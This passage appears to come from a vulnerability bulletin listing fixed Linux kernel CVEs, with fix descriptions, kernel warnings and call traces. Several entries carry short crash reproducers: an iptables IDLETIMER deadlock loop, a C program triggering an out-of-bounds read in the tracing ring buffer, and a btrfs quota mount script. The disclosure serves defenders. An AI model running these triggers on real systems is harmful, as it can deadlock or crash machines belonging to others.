socket close, the TCP timers are not cleared because sk->sk_net_refcnt=1: (cf. commit 151c9c724d05 ("tcp: properly terminate timers for kernel sockets")) net/ipv4/tcp.c: void tcp_close(struct sock *sk, long timeout) { lock_sock(sk); __tcp_close(sk, timeout); release_sock(sk); if (!sk->sk_net_refcnt) inet_csk_clear_xmit_timers_sync(sk); sock_put(sk); } Which will throw a lockdep warning and then, as expected, deadlock on tcp_write_timer(). A way to reproduce this is by running the reproducer from ef7134c7fc48 and then 'rmmod cifs'. A few seconds later, the deadlock/lockdep warning shows up. Fix: We shouldn't mess with socket internals ourselves, so do not set sk_net_refcnt manually. Also change __sock_create() to sock_create_kern() for explicitness. As for non-init_net network namespaces, we deal with it the best way we can -- hold an extra netns reference for server->ssocket and drop it when it's released. This ensures that the netns still exists whenever we need to create/destroy server->ssocket, but is not directly tied to it. | 2025-01-11 | not yet calculated | CVE-2024-54680 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: netfilter: IDLETIMER: Fix for possible ABBA deadlock Deletion of the last rule referencing a given idletimer may happen at the same time as a read of its file in sysfs: | ====================================================== | WARNING: possible circular locking dependency detected | 6.12.0-rc7-01692-g5e9a28f41134-dirty #594 Not tainted | ------------------------------------------------------ | iptables/3303 is trying to acquire lock: | ffff8881057e04b8 (kn->active#48){++++}-{0:0}, at: __kernfs_remove+0x20 | | but task is already holding lock: | ffffffffa0249068 (list_mutex){+.+.}-{3:3}, at: idletimer_tg_destroy_v] | | which lock already depends on the new lock. A simple reproducer is: | #!/bin/bash | | while true; do | iptables -A INPUT -i foo -j IDLETIMER --timeout 10 --label "testme" | iptables -D INPUT -i foo -j IDLETIMER --timeout 10 --label "testme" | done & | while true; do | cat /sys/class/xt_idletimer/timers/testme >/dev/null | done Avoid this by freeing list_mutex right after deleting the element from the list, then continuing with the teardown. | 2025-01-11 | not yet calculated | CVE-2024-54683 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: net: renesas: rswitch: avoid use-after-put for a device tree node The device tree node saved in the rswitch_device structure is used at several driver locations. So passing this node to of_node_put() after the first use is wrong. Move of_node_put() for this node to exit paths. | 2025-01-11 | not yet calculated | CVE-2024-55639 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: xfs: unlock inodes when erroring out of xfs_trans_alloc_dir Debugging a filesystem patch with generic/475 caused the system to hang after observing the following sequences in dmesg: XFS (dm-0): metadata I/O error in "xfs_imap_to_bp+0x61/0xe0 [xfs]" at daddr 0x491520 len 32 error 5 XFS (dm-0): metadata I/O error in "xfs_btree_read_buf_block+0xba/0x160 [xfs]" at daddr 0x3445608 len 8 error 5 XFS (dm-0): metadata I/O error in "xfs_imap_to_bp+0x61/0xe0 [xfs]" at daddr 0x138e1c0 len 32 error 5 XFS (dm-0): log I/O error -5 XFS (dm-0): Metadata I/O Error (0x1) detected at xfs_trans_read_buf_map+0x1ea/0x4b0 [xfs] (fs/xfs/xfs_trans_buf.c:311). Shutting down filesystem. XFS (dm-0): Please unmount the filesystem and rectify the problem(s) XFS (dm-0): Internal error dqp->q_ino.reserved < dqp->q_ino.count at line 869 of file fs/xfs/xfs_trans_dquot.c. Caller xfs_trans_dqresv+0x236/0x440 [xfs] XFS (dm-0): Corruption detected. Unmount and run xfs_repair XFS (dm-0): Unmounting Filesystem be6bcbcc-9921-4deb-8d16-7cc94e335fa7 The system is stuck in unmount trying to lock a couple of inodes so that they can be purged. The dquot corruption notice above is a clue to what happened -- a link() call tried to set up a transaction to link a child into a directory. Quota reservation for the transaction failed after IO errors shut down the filesystem, but then we forgot to unlock the inodes on our way out. Fix that. | 2025-01-11 | not yet calculated | CVE-2024-55641 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: block: Prevent potential deadlocks in zone write plug error recovery Zone write plugging for handling writes to zones of a zoned block device always execute a zone report whenever a write BIO to a zone fails. The intent of this is to ensure that the tracking of a zone write pointer is always correct to ensure that the alignment to a zone write pointer of write BIOs can be checked on submission and that we can always correctly emulate zone append operations using regular write BIOs. However, this error recovery scheme introduces a potential deadlock if a device queue freeze is initiated while BIOs are still plugged in a zone write plug and one of these write operation fails. In such case, the disk zone write plug error recovery work is scheduled and executes a report zone. This in turn can result in a request allocation in the underlying driver to issue the report zones command to the device. But with the device queue freeze already started, this allocation will block, preventing the report zone execution and the continuation of the processing of the plugged BIOs. As plugged BIOs hold a queue usage reference, the queue freeze itself will never complete, resulting in a deadlock. Avoid this problem by completely removing from the zone write plugging code the use of report zones operations after a failed write operation, instead relying on the device user to either execute a report zones, reset the zone, finish the zone, or give up writing to the device (which is a fairly common pattern for file systems which degrade to read-only after write failures). This is not an unreasonnable requirement as all well-behaved applications, FSes and device mapper already use report zones to recover from write errors whenever possible by comparing the current position of a zone write pointer with what their assumption about the position is. The changes to remove the automatic error recovery are as follows: - Completely remove the error recovery work and its associated resources (zone write plug list head, disk error list, and disk zone_wplugs_work work struct). This also removes the functions disk_zone_wplug_set_error() and disk_zone_wplug_clear_error(). - Change the BLK_ZONE_WPLUG_ERROR zone write plug flag into BLK_ZONE_WPLUG_NEED_WP_UPDATE. This new flag is set for a zone write plug whenever a write opration targetting the zone of the zone write plug fails. This flag indicates that the zone write pointer offset is not reliable and that it must be updated when the next report zone, reset zone, finish zone or disk revalidation is executed. - Modify blk_zone_write_plug_bio_endio() to set the BLK_ZONE_WPLUG_NEED_WP_UPDATE flag for the target zone of a failed write BIO. - Modify the function disk_zone_wplug_set_wp_offset() to clear this new flag, thus implementing recovery of a correct write pointer offset with the reset (all) zone and finish zone operations. - Modify blkdev_report_zones() to always use the disk_report_zones_cb() callback so that disk_zone_wplug_sync_wp_offset() can be called for any zone marked with the BLK_ZONE_WPLUG_NEED_WP_UPDATE flag. This implements recovery of a correct write pointer offset for zone write plugs marked with BLK_ZONE_WPLUG_NEED_WP_UPDATE and within the range of the report zones operation executed by the user. - Modify blk_revalidate_seq_zone() to call disk_zone_wplug_sync_wp_offset() for all sequential write required zones when a zoned block device is revalidated, thus always resolving any inconsistency between the write pointer offset of zone write plugs and the actual write pointer position of sequential zones. | 2025-01-11 | not yet calculated | CVE-2024-55642 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: KVM: x86: Play nice with protected guests in complete_hypercall_exit() Use is_64_bit_hypercall() instead of is_64_bit_mode() to detect a 64-bit hypercall when completing said hypercall. For guests with protected state, e.g. SEV-ES and SEV-SNP, KVM must assume the hypercall was made in 64-bit mode as the vCPU state needed to detect 64-bit mode is unavailable. Hacking the sev_smoke_test selftest to generate a KVM_HC_MAP_GPA_RANGE hypercall via VMGEXIT trips the WARN: ------------[ cut here ]------------ WARNING: CPU: 273 PID: 326626 at arch/x86/kvm/x86.h:180 complete_hypercall_exit+0x44/0xe0 [kvm] Modules linked in: kvm_amd kvm ... [last unloaded: kvm] CPU: 273 UID: 0 PID: 326626 Comm: sev_smoke_test Not tainted 6.12.0-smp--392e932fa0f3-feat #470 Hardware name: Google Astoria/astoria, BIOS 0.20240617.0-0 06/17/2024 RIP: 0010:complete_hypercall_exit+0x44/0xe0 [kvm] Call Trace: <TASK> kvm_arch_vcpu_ioctl_run+0x2400/0x2720 [kvm] kvm_vcpu_ioctl+0x54f/0x630 [kvm] __se_sys_ioctl+0x6b/0xc0 do_syscall_64+0x83/0x160 entry_SYSCALL_64_after_hwframe+0x76/0x7e </TASK> ---[ end trace 0000000000000000 ]--- | 2025-01-11 | not yet calculated | CVE-2024-55881 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: Drivers: hv: util: Avoid accessing a ringbuffer not initialized yet If the KVP (or VSS) daemon starts before the VMBus channel's ringbuffer is fully initialized, we can hit the panic below: hv_utils: Registering HyperV Utility Driver hv_vmbus: registering driver hv_utils ... BUG: kernel NULL pointer dereference, address: 0000000000000000 CPU: 44 UID: 0 PID: 2552 Comm: hv_kvp_daemon Tainted: G E 6.11.0-rc3+ #1 RIP: 0010:hv_pkt_iter_first+0x12/0xd0 Call Trace: ... vmbus_recvpacket hv_kvp_onchannelcallback vmbus_on_event tasklet_action_common tasklet_action handle_softirqs irq_exit_rcu sysvec_hyperv_stimer0 </IRQ> <TASK> asm_sysvec_hyperv_stimer0 ... kvp_register_done hvt_op_read vfs_read ksys_read __x64_sys_read This can happen because the KVP/VSS channel callback can be invoked even before the channel is fully opened: 1) as soon as hv_kvp_init() -> hvutil_transport_init() creates /dev/vmbus/hv_kvp, the kvp daemon can open the device file immediately and register itself to the driver by writing a message KVP_OP_REGISTER1 to the file (which is handled by kvp_on_msg() ->kvp_handle_handshake()) and reading the file for the driver's response, which is handled by hvt_op_read(), which calls hvt->on_read(), i.e. kvp_register_done(). 2) the problem with kvp_register_done() is that it can cause the channel callback to be called even before the channel is fully opened, and when the channel callback is starting to run, util_probe()-> vmbus_open() may have not initialized the ringbuffer yet, so the callback can hit the panic of NULL pointer dereference. To reproduce the panic consistently, we can add a "ssleep(10)" for KVP in __vmbus_open(), just before the first hv_ringbuffer_init(), and then we unload and reload the driver hv_utils, and run the daemon manually within the 10 seconds. Fix the panic by reordering the steps in util_probe() so the char dev entry used by the KVP or VSS daemon is not created until after vmbus_open() has completed. This reordering prevents the race condition from happening. | 2025-01-11 | not yet calculated | CVE-2024-55916 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: ring-buffer: Fix overflow in __rb_map_vma An overflow occurred when performing the following calculation: nr_pages = ((nr_subbufs + 1) << subbuf_order) - pgoff; Add a check before the calculation to avoid this problem. syzbot reported this as a slab-out-of-bounds in __rb_map_vma: BUG: KASAN: slab-out-of-bounds in __rb_map_vma+0x9ab/0xae0 kernel/trace/ring_buffer.c:7058 Read of size 8 at addr ffff8880767dd2b8 by task syz-executor187/5836 CPU: 0 UID: 0 PID: 5836 Comm: syz-executor187 Not tainted 6.13.0-rc2-syzkaller-00159-gf932fb9b4074 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 11/25/2024 Call Trace: <TASK> __dump_stack lib/dump_stack.c:94 [inline] dump_stack_lvl+0x116/0x1f0 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0xc3/0x620 mm/kasan/report.c:489 kasan_report+0xd9/0x110 mm/kasan/report.c:602 __rb_map_vma+0x9ab/0xae0 kernel/trace/ring_buffer.c:7058 ring_buffer_map+0x56e/0x9b0 kernel/trace/ring_buffer.c:7138 tracing_buffers_mmap+0xa6/0x120 kernel/trace/trace.c:8482 call_mmap include/linux/fs.h:2183 [inline] mmap_file mm/internal.h:124 [inline] __mmap_new_file_vma mm/vma.c:2291 [inline] __mmap_new_vma mm/vma.c:2355 [inline] __mmap_region+0x1786/0x2670 mm/vma.c:2456 mmap_region+0x127/0x320 mm/mmap.c:1348 do_mmap+0xc00/0xfc0 mm/mmap.c:496 vm_mmap_pgoff+0x1ba/0x360 mm/util.c:580 ksys_mmap_pgoff+0x32c/0x5c0 mm/mmap.c:542 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] __x64_sys_mmap+0x125/0x190 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xcd/0x250 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f The reproducer for this bug is: ------------------------8<------------------------- #include <fcntl.h> #include <stdlib.h> #include <unistd.h> #include <asm/types.h> #include <sys/mman.h> int main(int argc, char **argv) { int page_size = getpagesize(); int fd; void *meta; system("echo 1 > /sys/kernel/tracing/buffer_size_kb"); fd = open("/sys/kernel/tracing/per_cpu/cpu0/trace_pipe_raw", O_RDONLY); meta = mmap(NULL, page_size, PROT_READ, MAP_SHARED, fd, page_size * 5); } ------------------------>8------------------------- | 2025-01-11 | not yet calculated | CVE-2024-56368 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: drm/modes: Avoid divide by zero harder in drm_mode_vrefresh() drm_mode_vrefresh() is trying to avoid divide by zero by checking whether htotal or vtotal are zero. But we may still end up with a div-by-zero of vtotal*htotal*... | 2025-01-11 | not yet calculated | CVE-2024-56369 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: net: tun: fix tun_napi_alloc_frags() syzbot reported the following crash [1] Issue came with the blamed commit. Instead of going through all the iov components, we keep using the first one and end up with a malformed skb. [1] kernel BUG at net/core/skbuff.c:2849 ! Oops: invalid opcode: 0000 [#1] PREEMPT SMP KASAN PTI CPU: 0 UID: 0 PID: 6230 Comm: syz-executor132 Not tainted 6.13.0-rc1-syzkaller-00407-g96b6fcc0ee41 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 11/25/2024 RIP: 0010:__pskb_pull_tail+0x1568/0x1570 net/core/skbuff.c:2848 Code: 38 c1 0f 8c 32 f1 ff ff 4c 89 f7 e8 92 96 74 f8 e9 25 f1 ff ff e8 e8 ae 09 f8 48 8b 5c 24 08 e9 eb fb ff ff e8 d9 ae 09 f8 90 <0f> 0b 66 0f 1f 44 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 RSP: 0018:ffffc90004cbef30 EFLAGS: 00010293 RAX: ffffffff8995c347 RBX: 00000000fffffff2 RCX: ffff88802cf45a00 RDX: 0000000000000000 RSI: 00000000fffffff2 RDI: 0000000000000000 RBP: ffff88807df0c06a R08: ffffffff8995b084 R09: 1ffff1100fbe185c R10: dffffc0000000000 R11: ffffed100fbe185d R12: ffff888076e85d50 R13: ffff888076e85c80 R14: ffff888076e85cf4 R15: ffff888076e85c80 FS: 00007f0dca6ea6c0(0000) GS:ffff8880b8600000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f0dca6ead58 CR3: 00000000119da000 CR4: 00000000003526f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> skb_cow_data+0x2da/0xcb0 net/core/skbuff.c:5284 tipc_aead_decrypt net/tipc/crypto.c:894 [inline] tipc_crypto_rcv+0x402/0x24e0 net/tipc/crypto.c:1844 tipc_rcv+0x57e/0x12a0 net/tipc/node.c:2109 tipc_l2_rcv_msg+0x2bd/0x450 net/tipc/bearer.c:668 __netif_receive_skb_list_ptype net/core/dev.c:5720 [inline] __netif_receive_skb_list_core+0x8b7/0x980 net/core/dev.c:5762 __netif_receive_skb_list net/core/dev.c:5814 [inline] netif_receive_skb_list_internal+0xa51/0xe30 net/core/dev.c:5905 gro_normal_list include/net/gro.h:515 [inline] napi_complete_done+0x2b5/0x870 net/core/dev.c:6256 napi_complete include/linux/netdevice.h:567 [inline] tun_get_user+0x2ea0/0x4890 drivers/net/tun.c:1982 tun_chr_write_iter+0x10d/0x1f0 drivers/net/tun.c:2057 do_iter_readv_writev+0x600/0x880 vfs_writev+0x376/0xba0 fs/read_write.c:1050 do_writev+0x1b6/0x360 fs/read_write.c:1096 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xf3/0x230 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f | 2025-01-11 | not yet calculated | CVE-2024-56372 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: net: ethernet: oa_tc6: fix tx skb race condition between reference pointers There are two skb pointers to manage tx skb's enqueued from n/w stack. waiting_tx_skb pointer points to the tx skb which needs to be processed and ongoing_tx_skb pointer points to the tx skb which is being processed. SPI thread prepares the tx data chunks from the tx skb pointed by the ongoing_tx_skb pointer. When the tx skb pointed by the ongoing_tx_skb is processed, the tx skb pointed by the waiting_tx_skb is assigned to ongoing_tx_skb and the waiting_tx_skb pointer is assigned with NULL. Whenever there is a new tx skb from n/w stack, it will be assigned to waiting_tx_skb pointer if it is NULL. Enqueuing and processing of a tx skb handled in two different threads. Consider a scenario where the SPI thread processed an ongoing_tx_skb and it moves next tx skb from waiting_tx_skb pointer to ongoing_tx_skb pointer without doing any NULL check. At this time, if the waiting_tx_skb pointer is NULL then ongoing_tx_skb pointer is also assigned with NULL. After that, if a new tx skb is assigned to waiting_tx_skb pointer by the n/w stack and there is a chance to overwrite the tx skb pointer with NULL in the SPI thread. Finally one of the tx skb will be left as unhandled, resulting packet missing and memory leak. - Consider the below scenario where the TXC reported from the previous transfer is 10 and ongoing_tx_skb holds an tx ethernet frame which can be transported in 20 TXCs and waiting_tx_skb is still NULL. tx_credits = 10; /* 21 are filled in the previous transfer */ ongoing_tx_skb = 20; waiting_tx_skb = NULL; /* Still NULL */ - So, (tc6->ongoing_tx_skb || tc6->waiting_tx_skb) becomes true. - After oa_tc6_prepare_spi_tx_buf_for_tx_skbs() ongoing_tx_skb = 10; waiting_tx_skb = NULL; /* Still NULL */ - Perform SPI transfer. - Process SPI rx buffer to get the TXC from footers. - Now let's assume previously filled 21 TXCs are freed so we are good to transport the next remaining 10 tx chunks from ongoing_tx_skb. tx_credits = 21; ongoing_tx_skb = 10; waiting_tx_skb = NULL; - So, (tc6->ongoing_tx_skb || tc6->waiting_tx_skb) becomes true again. - In the oa_tc6_prepare_spi_tx_buf_for_tx_skbs() ongoing_tx_skb = NULL; waiting_tx_skb = NULL; - Now the below bad case might happen, Thread1 (oa_tc6_start_xmit) Thread2 (oa_tc6_spi_thread_handler) --------------------------- ----------------------------------- - if waiting_tx_skb is NULL - if ongoing_tx_skb is NULL - ongoing_tx_skb = waiting_tx_skb - waiting_tx_skb = skb - waiting_tx_skb = NULL ... - ongoing_tx_skb = NULL - if waiting_tx_skb is NULL - waiting_tx_skb = skb To overcome the above issue, protect the moving of tx skb reference from waiting_tx_skb pointer to ongoing_tx_skb pointer and assigning new tx skb to waiting_tx_skb pointer, so that the other thread can't access the waiting_tx_skb pointer until the current thread completes moving the tx skb reference safely. | 2025-01-11 | not yet calculated | CVE-2024-56788 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: net/smc: check return value of sock_recvmsg when draining clc data When receiving clc msg, the field length in smc_clc_msg_hdr indicates the length of msg should be received from network and the value should not be fully trusted as it is from the network. Once the value of length exceeds the value of buflen in function smc_clc_wait_msg it may run into deadloop when trying to drain the remaining data exceeding buflen. This patch checks the return value of sock_recvmsg when draining data in case of deadloop in draining. | 2025-01-11 | not yet calculated | CVE-2024-57791 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: power: supply: gpio-charger: Fix set charge current limits Fix set charge current limits for devices which allow to set the lowest charge current limit to be greater zero. If requested charge current limit is below lowest limit, the index equals current_limit_map_size which leads to accessing memory beyond allocated memory. | 2025-01-11 | not yet calculated | CVE-2024-57792 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: virt: tdx-guest: Just leak decrypted memory on unrecoverable errors In CoCo VMs it is possible for the untrusted host to cause set_memory_decrypted() to fail such that an error is returned and the resulting memory is shared. Callers need to take care to handle these errors to avoid returning decrypted (shared) memory to the page allocator, which could lead to functional or security issues. Leak the decrypted memory when set_memory_decrypted() fails, and don't need to print an error since set_memory_decrypted() will call WARN_ONCE(). | 2025-01-11 | not yet calculated | CVE-2024-57793 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: drm/dp_mst: Ensure mst_primary pointer is valid in drm_dp_mst_handle_up_req() While receiving an MST up request message from one thread in drm_dp_mst_handle_up_req(), the MST topology could be removed from another thread via drm_dp_mst_topology_mgr_set_mst(false), freeing mst_primary and setting drm_dp_mst_topology_mgr::mst_primary to NULL. This could lead to a NULL deref/use-after-free of mst_primary in drm_dp_mst_handle_up_req(). Avoid the above by holding a reference for mst_primary in drm_dp_mst_handle_up_req() while it's used. v2: Fix kfreeing the request if getting an mst_primary reference fails. | 2025-01-11 | not yet calculated | CVE-2024-57798 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: phy: rockchip: samsung-hdptx: Set drvdata before enabling runtime PM In some cases, rk_hdptx_phy_runtime_resume() may be invoked before platform_set_drvdata() is executed in ->probe(), leading to a NULL pointer dereference when using the return of dev_get_drvdata(). Ensure platform_set_drvdata() is called before devm_pm_runtime_enable(). | 2025-01-11 | not yet calculated | CVE-2024-57799 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: ALSA: memalloc: prefer dma_mapping_error() over explicit address checking With CONFIG_DMA_API_DEBUG enabled, the following warning is observed: DMA-API: snd_hda_intel 0000:03:00.1: device driver failed to check map error[device address=0x00000000ffff0000] [size=20480 bytes] [mapped as single] WARNING: CPU: 28 PID: 2255 at kernel/dma/debug.c:1036 check_unmap+0x1408/0x2430 CPU: 28 UID: 42 PID: 2255 Comm: wireplumber Tainted: G W L 6.12.0-10-133577cad6bf48e5a7848c4338124081393bfe8a+ #759 debug_dma_unmap_page+0xe9/0xf0 snd_dma_wc_free+0x85/0x130 [snd_pcm] snd_pcm_lib_free_pages+0x1e3/0x440 [snd_pcm] snd_pcm_common_ioctl+0x1c9a/0x2960 [snd_pcm] snd_pcm_ioctl+0x6a/0xc0 [snd_pcm] ... Check for returned DMA addresses using specialized dma_mapping_error() helper which is generally recommended for this purpose by Documentation/core-api/dma-api.rst. | 2025-01-11 | not yet calculated | CVE-2024-57800 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: scsi: mpi3mr: Fix corrupt config pages PHY state is switched in sysfs The driver, through the SAS transport, exposes a sysfs interface to enable/disable PHYs in a controller/expander setup. When multiple PHYs are disabled and enabled in rapid succession, the persistent and current config pages related to SAS IO unit/SAS Expander pages could get corrupted. Use separate memory for each config request. | 2025-01-11 | not yet calculated | CVE-2024-57804 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: ASoC: SOF: Intel: hda-dai: Do not release the link DMA on STOP The linkDMA should not be released on stop trigger since a stream re-start might happen without closing of the stream. This leaves a short time for other streams to 'steal' the linkDMA since it has been released. This issue is not easy to reproduce under normal conditions as usually after stop the stream is closed, or the same stream is restarted, but if another stream got in between the stop and start, like this: aplay -Dhw:0,3 -c2 -r48000 -fS32_LE /dev/zero -d 120 CTRL+z aplay -Dhw:0,0 -c2 -r48000 -fS32_LE /dev/zero -d 120 then the link DMA channels will be mixed up, resulting firmware error or crash. | 2025-01-11 | not yet calculated | CVE-2024-57805 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: btrfs: fix transaction atomicity bug when enabling simple quotas Set squota incompat bit before committing the transaction that enables the feature. With the config CONFIG_BTRFS_ASSERT enabled, an assertion failure occurs regarding the simple quota feature. [5.596534] assertion failed: btrfs_fs_incompat(fs_info, SIMPLE_QUOTA), in fs/btrfs/qgroup.c:365 [5.597098] ------------[ cut here ]------------ [5.597371] kernel BUG at fs/btrfs/qgroup.c:365! [5.597946] CPU: 1 UID: 0 PID: 268 Comm: mount Not tainted 6.13.0-rc2-00031-gf92f4749861b #146 [5.598450] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014 [5.599008] RIP: 0010:btrfs_read_qgroup_config+0x74d/0x7a0 [5.604303] <TASK> [5.605230] ? btrfs_read_qgroup_config+0x74d/0x7a0 [5.605538] ? exc_invalid_op+0x56/0x70 [5.605775] ? btrfs_read_qgroup_config+0x74d/0x7a0 [5.606066] ? asm_exc_invalid_op+0x1f/0x30 [5.606441] ? btrfs_read_qgroup_config+0x74d/0x7a0 [5.606741] ? btrfs_read_qgroup_config+0x74d/0x7a0 [5.607038] ? try_to_wake_up+0x317/0x760 [5.607286] open_ctree+0xd9c/0x1710 [5.607509] btrfs_get_tree+0x58a/0x7e0 [5.608002] vfs_get_tree+0x2e/0x100 [5.608224] fc_mount+0x16/0x60 [5.608420] btrfs_get_tree+0x2f8/0x7e0 [5.608897] vfs_get_tree+0x2e/0x100 [5.609121] path_mount+0x4c8/0xbc0 [5.609538] __x64_sys_mount+0x10d/0x150 The issue can be easily reproduced using the following reproducer: root@q:linux# cat repro.sh set -e mkfs.btrfs -q -f /dev/sdb mount /dev/sdb /mnt/btrfs btrfs quota enable -s /mnt/btrfs umount /mnt/btrfs mount /dev/sdb /mnt/btrfs The issue is that when enabling quotas, at btrfs_quota_enable(), we set BTRFS_QGROUP_STATUS_FLAG_SIMPLE_MODE at fs_info->qgroup_flags and persist it in the quota root in the item with the key BTRFS_QGROUP_STATUS_KEY, but we only set the incompat bit BTRFS_FEATURE_INCOMPAT_SIMPLE_QUOTA after we commit the transaction used to enable simple quotas. This means that if after that transaction commit we unmount the filesystem without starting and committing any other transaction, or we have a power failure, the next time we mount the filesystem we will find the flag BTRFS_QGROUP_STATUS_FLAG_SIMPLE_MODE set in the item with the key BTRFS_QGROUP_STATUS_KEY but we will not find the incompat bit BTRFS_FEATURE_INCOMPAT_SIMPLE_QUOTA set in the superblock, triggering an assertion failure at: btrfs_read_qgroup_config() -> qgroup_read_enable_gen() To fix this issue, set the BTRFS_FEATURE_INCOMPAT_SIMPLE_QUOTA flag immediately after setting the BTRFS_QGROUP_STATUS_FLAG_SIMPLE_MODE. This ensures that both flags are flushed to disk within the same transaction. | 2025-01-11 | not yet calculated | CVE-2024-57806 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: scsi: megaraid_sas: Fix for a potential deadlock This fixes a 'possible circular locking dependency detected' warning CPU0 CPU1 ---- ---- lock(&instance->reset_mutex); lock(&shost->scan_mutex); lock(&instance->reset_mutex); lock(&shost->scan_mutex); Fix this by temporarily releasing the reset_mutex. | 2025-01-11 | not yet calculated | CVE-2024-57807 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: PCI: imx6: Fix suspend/resume support on i.MX6QDL The suspend/resume functionality is currently broken on the i.MX6QDL platform, as documented in the NXP errata (ERR005723): https://www.nxp.com/docs/en/errata/IMX6DQCE.pdf This patch addresses the issue by sharing most of the suspend/resume sequences used by other i.MX devices, while avoiding modifications to critical registers that disrupt the PCIe functionality. It targets the same problem as the following downstream commit: https://github.com/nxp-imx/linux-imx/commit/4e92355e1f79d225ea842511fcfd42b343b32995 Unlike the downstream commit, this patch also resets the connected PCIe device if possible. Without this reset, certain drivers, such as ath10k or iwlwifi, will crash on resume. The device reset is also done by the driver on other i.MX platforms, making this patch consistent with existing practices. Upon resuming, the kernel will hang and display an error. Here's an example of the error encountered with the ath10k driver: ath10k_pci 0000:01:00.0: Unable to change power state from D3hot to D0, device inaccessible Unhandled fault: imprecise external abort (0x1406) at 0x0106f944 Without this patch, suspend/resume will fail on i.MX6QDL devices if a PCIe device is connected. [kwilczynski: commit log, added tag for stable releases] | 2025-01-11 | not yet calculated | CVE-2024-57809 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: s390/entry: Mark IRQ entries to fix stack depot warnings The stack depot filters out everything outside of the top interrupt context as an uninteresting or irrelevant part of the stack traces. This helps with stack trace de-duplication, avoiding an explosion of saved stack traces that share the same IRQ context code path but originate from different randomly interrupted points, eventually exhausting the stack depot. Filtering uses in_irqentry_text() to identify functions within the .irqentry.text and .softirqentry.text sections, which then become the last stack trace entries being saved. While __do_softirq() is placed into the .softirqentry.text section by common code, populating .irqentry.text is architecture-specific. Currently, the .irqentry.text section on s390 is empty, which prevents stack depot filtering and de-duplication and could result in warnings like: Stack depot reached limit capacity WARNING: CPU: 0 PID: 286113 at lib/stackdepot.c:252 depot_alloc_stack+0x39a/0x3c8 with PREEMPT and KASAN enabled. Fix this by moving the IO/EXT interrupt handlers from .kprobes.text into the .irqentry.text section and updating the kprobes blacklist to include the .irqentry.text section. This is done only for asynchronous interrupts and explicitly not for program checks, which are synchronous and where the context beyond the program check is important to preserve. Despite machine checks being somewhat in between, they are extremely rare, and preserving context when possible is also of value. SVCs and Restart Interrupts are not relevant, one being always at the boundary to user space and the other being a one-time thing. IRQ entries filtering is also optionally used in ftrace function graph, where the same logic applies. | 2025-01-11 | not yet calculated | CVE-2024-57838 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: Revert "readahead: properly shorten readahead when falling back to do_page_cache_ra()" This reverts commit 7c877586da3178974a8a94577b6045a48377ff25. Anders and Philippe have reported that recent kernels occasionally hang when used with NFS in readahead code. The problem has been bisected to 7c877586da3 ("readahead: properly shorten readahead when falling back to do_page_cache_ra()"). The cause of the problem is that ra->size can be shrunk by read_pages() call and subsequently we end up calling do_page_cache_ra() with negative (read huge positive) number of pages. Let's revert 7c877586da3 for now until we can find a proper way how the logic in read_pages() and page_cache_ra_order() can coexist. This can lead to reduced readahead throughput due to readahead window confusion but that's better than outright hangs. | 2025-01-11 | not yet calculated | CVE-2024-57839 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: virtio-net: fix overflow inside virtnet_rq_alloc When the frag just got a page, then may lead to regression on VM. Specially if the sysctl net.core.high_order_alloc_disable value is 1, then the frag always get a page when do refill. Which could see reliable crashes or scp failure (scp a file 100M in size to VM). The issue is that the virtnet_rq_dma takes up 16 bytes at the beginning of a new frag. When the frag size is larger than PAGE_SIZE, everything is fine. However, if the frag is only one page and the total size of the buffer and virtnet_rq_dma is larger than one page, an overflow may occur. The commit f9dac92ba908 ("virtio_ring: enable premapped mode whatever use_dma_api") introduced this problem. And we reverted some commits to fix this in last linux version. Now we try to enable it and fix this bug directly. Here, when the frag size is not enough, we reduce the buffer len to fix this problem. | 2025-01-11 | not yet calculated | CVE-2024-57843 |
| Linux--Linux |
